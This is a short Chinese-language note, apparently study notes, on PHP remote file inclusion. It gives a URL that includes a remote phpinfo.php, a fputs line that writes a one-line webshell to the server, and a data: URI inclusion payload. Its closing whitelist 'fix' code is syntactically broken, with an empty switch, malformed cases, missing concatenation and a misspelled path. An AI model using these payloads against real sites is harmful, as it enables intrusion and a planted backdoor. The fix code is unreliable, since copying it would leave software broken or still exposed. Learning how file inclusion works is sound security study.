当allow_url_open=on

allow_url_include=on

就会造成文件包含漏洞

http://要入侵的网站/vulnerabilities/fi/?page=http://本地网站/phpinfo.php

这样就可以执行phpinfo.php  中的phpinfo（）函数

还有就是可以直接在服务器上fput上webshell一句话木马

fputs(fopen('rfi_shell.php','w'),'<php小马>）

http://127.0.0.1/rfi.php?file=data:text/plain,<上面的一句话也可以put进去>

修复代码，白名单思想

<?php

$file=$_GET['file'];

switch (){

case 'main';

case 'foo';

case 'bar';

include '/home/wwwroot/defualt' $file.php;

default '/home/wwwroot/default/index.php';

}

?>